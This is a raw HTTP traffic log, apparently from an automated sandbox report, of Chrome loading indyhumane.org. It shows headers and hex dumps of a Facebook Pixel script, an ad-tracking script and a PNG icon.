                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-6EXVQ4Nm' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1INData Raw: 2f
                                                                                                                                                                                                                                                        Data Ascii: /
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                                                                                        Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC16384INData Raw: 7c 64 3d 3d 3d 22 47 54 4d 22 7c 7c 64 3d 3d 3d 22 4a 53 4f 4e 5f 4c 44 22 7c 7c 64 3d 3d 3d 22 4d 45 54 41 5f 54 41 47 22 7c 7c 64 3d 3d 3d 22 4f 50 45 4e 5f 47 52 41 50 48 22 7c 7c 64 3d 3d 3d 22 52 44 46 41 22 7c 7c 64 3d 3d 3d 22 53 43 48 45 4d 41 5f 44 4f 54 5f 4f 52 47 22 7c 7c 64 3d 3d 3d 22 55 52 49 22 3f 64 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 21 3d 6e 75 6c 6c 26 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e
                                                                                                                                                                                                                                                        Data Ascii: |d==="GTM"||d==="JSON_LD"||d==="META_TAG"||d==="OPEN_GRAPH"||d==="RDFA"||d==="SCHEMA_DOT_ORG"||d==="URI"?d:null;return b!=null&&c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefin
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC16384INData Raw: 75 72 6e 20 6a 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 78 70 65 72 69 6d 65 6e 74 73 54 79 70 65 64 65 66 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f
                                                                                                                                                                                                                                                        Data Ascii: urn j.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEventsExperimentsTypedef",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enfo
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC16384INData Raw: 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 42 61 73 65 45 76 65 6e 74 22 29 2c 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 69 78 65 6c 54 79 70 65 64 65 66 22 29 2c 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69
                                                                                                                                                                                                                                                        Data Ascii: odules("SignalsFBEventsBaseEvent"),b=f.getFbeventsModules("SignalsFBEventsPixelTypedef"),c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefi
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1703INData Raw: 62 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 2e 63 61 6c 6c 26 26 62 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 28 29 3d 3d 3d 64 3f 62 3a 6e 75 6c 6c 3b 62 21 3d 3d 6e 75 6c 6c 26 26 28 6a 5b 61 5b 30 5d 5d 3d 6a 5b 61 5b 30 5d 5d 7c 7c 7b 7d 2c 6a 5b 61 5b 30 5d 5d 5b 61 5b 31 5d 5d 3d 62 29 3b 72 65 74 75 72 6e 20 62 21 3d 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c
                                                                                                                                                                                                                                                        Data Ascii: b.getProtocol.call&&b.getProtocol()===d?b:null;b!==null&&(j[a[0]]=j[a[0]]||{},j[a[0]][a[1]]=b);return b!==null}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).l
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC14681INData Raw: 6c 26 26 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 61 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 6e 63 6f 64 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 69 66 28 67 2e 66 62 71 3d 3d 6e 75 6c 6c 7c 7c 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28
                                                                                                                                                                                                                                                        Data Ascii: l&&(this.moduleEncodings=a)}},{key:"addEncodings",value:function(a){var c=this;if(g.fbq==null||g.fbq.__fbeventsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC16384INData Raw: 6c 73 46 42 45 76 65 6e 74 73 4c 6f 67 67 69 6e 67 22 29 2c 63 3d 62 2e 6c 6f 67 45 72 72 6f 72 3b 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 3b 76 61 72 20 64 3d 62 2e 6d 61 70 2c 65 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 3b 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65
                                                                                                                                                                                                                                                        Data Ascii: lsFBEventsLogging"),c=b.logError;b=f.getFbeventsModules("SignalsFBEventsUtils");var d=b.map,e=f.getFbeventsModules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET");f.getFbeventsModule
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC16384INData Raw: 6e 63 74 69 6f 6e 20 70 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 6e 75 6d 62 65 72 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d
                                                                                                                                                                                                                                                        Data Ascii: nction p(){return function(a){if(typeof a!=="string")throw new g();return a}}function q(){return function(a){if(typeof a!=="string"&&typeof a!=="number")throw new g();return a}}function r(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        96192.168.2.44986541.63.96.24432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC526OUTGET /assets/up.js?um=1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: up.pixel.ad
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Vary: accept-encoding
                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                        Server: AC1.1
                                                                                                                                                                                                                                                        X-LLID: c735f84663b598f85e0fa5589db8de5b
                                                                                                                                                                                                                                                        Age: 255741
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 15:53:52 GMT
                                                                                                                                                                                                                                                        Content-Length: 3738
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC3738INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 6f 2e 63 6e 74 72 55 70 54 61 67 3d 7b 70 69 78 65 6c 73 65 72 76 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 73 69 74 65 73 63 6f 75 74 2e 63 6f 6d 22 2c 70 69 78 65 6c 73 79 6e 63 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2d 73 79 6e 63 2e 73 69 74 65 73 63 6f 75 74 2e 63 6f 6d 22 2c 63 6c 69 63 6b 73 65 72 76 3a 22 68 74 74 70 73 3a 2f 2f 63 6c 69 63 6b 73 65 72 76 2e 73 69 74 65 73 63 6f 75 74 2e 63 6f 6d 2f 63 6f 6e 76 2f 22 2c 76 65 6e 64 6f 72 49 64 3a 31 35 36 2c 73 79 6e 63 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 6f 2e 63 6e 74 72 55 70 54 61 67 2e 70 69 78 65 6c 73 79 6e 63 2b 22 2f 64 6d 70 2f 61 73 79 6e 63 50 69 78 65 6c 53 79 6e 63 22 2c 61 3d 69 2e 63 72 65 61 74 65 45 6c 65
                                                                                                                                                                                                                                                        Data Ascii: !function(o,i){o.cntrUpTag={pixelserv:"https://pixel.sitescout.com",pixelsync:"https://pixel-sync.sitescout.com",clickserv:"https://clickserv.sitescout.com/conv/",vendorId:156,sync:function(){var r=o.cntrUpTag.pixelsync+"/dmp/asyncPixelSync",a=i.createEle


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        97192.168.2.449870192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC417OUTGET /wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC618INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 105963
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:06:27 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC751INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 e8 00 00 03 e8 08 06 00 00 00 4d a3 d4 e4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 01 9d 9d 49 44 41 54 78 9c ec dd 75 7c 53 d7 ff c7 f1 d7 4d d2 d4 dd 85 d2 02 c5 1d 82 bb 6d 0c c2 9c 6d 0c 98 31 b6 31 77 df 60 be fd e6 be 31 37 a6 4c 3a 61 82 0d 1d c1 61 b8 5b a1 a5 ee 6d 9a fc fe 48 c7 77 3e e4 26 27 f2 79 3e 1e 79 14 eb b9 6f ac b9 9f 7b ce f9 1c cd e9 74 22 84 10 42 08 21 84 10 42 08 b5 4c aa 03 08 21 84 10 fe 42 b3 58 83 81 18 20 b6 f1 63 0c 10 09 44 e3 7a cf 8d 06 cc 40 38 10 06 04 ff c3 cf 69 8d 9f fb 67 91 fc f5 bd 3b 04 08 6d fc 76 35 50 f3 a7 9f b7 03 e5 7f 33 56 09 e0 04 2a 81 3a a0 b4 f1 d7 96 02 b5 40 d5 3f fc 5c 79 e3 e7 96 00 c5 40 89 d3 96 5b fb 37 e3 0b 21
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRMpHYsIDATxu|SMmm11w`17L:aa[mHw>&'y>yo{t"B!BL!BX cDz@8ig;mv5P3V*:@?\y@[7!
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: 09 e1 a5 9c b8 96 c8 2f 03 6c 8d 1f 57 39 6d b9 d5 4a 53 09 21 84 f0 7a 52 a0 0b 21 84 f8 0b cd 62 6d 09 f4 06 7a 01 3d 71 2d 53 0f 52 1a 4a 08 df 66 c7 b5 8f fd 17 60 29 b0 c4 69 cb dd a2 36 92 10 42 08 6f 23 05 ba 10 42 04 b8 c6 d9 f1 1e b8 0a f2 df 5e 89 4a 43 09 11 18 0a 80 25 b8 0a f6 c5 c0 32 99 65 17 42 88 c0 26 05 ba 10 42 04 18 cd 62 8d 00 fa 00 03 80 81 b8 96 ac 07 2b 0d 25 84 00 a8 c5 b5 24 fe 67 60 3e b0 d8 69 cb ad 50 1b 49 08 21 84 27 49 81 2e 84 10 7e ae b1 99 5b 3f fe 57 90 77 05 4c 2a 33 09 21 8e 8a 1d 57 e3 b9 df 0a f6 85 d2 7c 4e 08 21 fc 9b 14 e8 42 08 e1 67 34 8b 35 0e 57 21 fe db ab 23 d2 59 5d 08 7f e0 c0 75 b4 db cf c0 3c 60 be d3 96 5b a4 34 91 10 42 08 5d 49 81 2e 84 10 3e 4e b3 58 cd b8 9a b9 0d 07 46 e0 3a ee cc a8 34 94 10 c2
                                                                                                                                                                                                                                                        Data Ascii: /lW9mJS!zR!bmz=q-SRJf`)i6Bo#B^JC%2eB&Bb+%$g`>iPI!'I.~[?WwL*3!W|N!Bg45W!#Y]u<`[4B]I.>NXF:4
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: c0 26 05 ba 10 42 19 cd 62 8d 07 ae 06 ae 02 e2 15 c7 11 42 08 11 d8 0a 81 e7 81 e7 9d b6 dc c3 aa c3 08 21 02 93 14 e8 42 08 8f d3 2c d6 4c 5c b3 e5 93 90 c6 6f 42 08 21 bc 4b 25 f0 3a f0 84 d3 96 bb 47 75 18 21 44 60 91 02 5d 08 e1 31 9a c5 da 0e d7 fe f2 f3 80 20 c5 71 84 10 42 88 7f 53 0f cc 00 1e 73 da 72 7f 55 1d 46 08 11 18 a4 40 17 42 b8 9d 66 b1 76 07 ee 06 ac 48 47 76 21 84 10 be c5 09 e4 02 0f 38 6d b9 36 d5 61 84 10 fe 4d 0a 74 21 84 db 68 16 6b 1f e0 2e 60 a4 ea 2c 42 08 21 84 0e be c3 55 a8 2f 56 1d 44 08 e1 9f a4 40 17 42 e8 4e b3 58 07 e2 9a 31 1f aa 3a 8b 10 42 08 e1 06 73 80 fb 9c b6 dc f9 aa 83 08 21 fc 8b 14 e8 42 08 dd 68 16 eb 00 60 1a 30 48 71 14 21 84 10 c2 13 e6 01 f7 3a 6d b9 3f ab 0e 22 84 f0 0f 52 a0 0b 21 4e 98 66 b1 f6 c5 55
                                                                                                                                                                                                                                                        Data Ascii: &BbB!B,L\oB!K%:Gu!D`]1 qBSsrUF@BfvHGv!8m6aMt!hk.`,B!U/VD@BNX1:Bs!Bh`0Hq!:m?"R!NfU
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: ea 20 42 f8 3b 39 07 5d 08 37 d3 2c d6 b3 80 75 48 71 2e 84 10 42 08 df 34 12 58 db 78 4f 23 84 70 23 99 41 17 c2 4d 34 8b 35 1a 78 0e 98 a0 3a 8b 10 42 5f 06 83 46 58 48 30 21 66 b3 eb 15 1c 84 d9 64 22 24 d8 8c 39 c8 44 70 50 10 21 c1 66 42 cc 41 98 83 82 08 0e 0a 22 34 d8 4c b0 39 e8 c8 cf 07 9b 83 08 31 bb 3e 1a 0d 06 82 cd 41 18 34 03 e6 20 13 46 a3 01 b3 c9 84 c1 e0 fa be c9 68 3c 72 6d a3 c1 40 90 c9 f8 2f e9 5c ea ea ed 38 7e f7 1e ef 74 3a 1b 7f cc 81 c3 e1 a4 a6 ae 8e 86 06 07 75 76 3b 76 7b 03 75 76 3b b5 75 f5 34 38 1c d4 d5 db a9 b7 db a9 ab b7 53 5d 5b 47 55 4d 2d 35 75 75 d4 d4 d6 53 67 af a7 b6 ae 9e ba 7a 3b b5 f5 ae 8f 75 f5 76 6a ea ea a8 ae a9 a3 ba b6 ce f5 ed da 3a e4 1e 43 08 bf f4 2e 70 b5 d3 96 5b aa 3a 88 10 fe 48 0a 74 21 dc 40
                                                                                                                                                                                                                                                        Data Ascii: B;9]7,uHq.B4XxO#p#AM45x:B_FXH0!fd"$9DpP!fBA"4L91>A4 Fh<rm@/\8~t:uv;v{uv;u48S][GUM-5uuSgz;uvj:C.p[:Ht!@
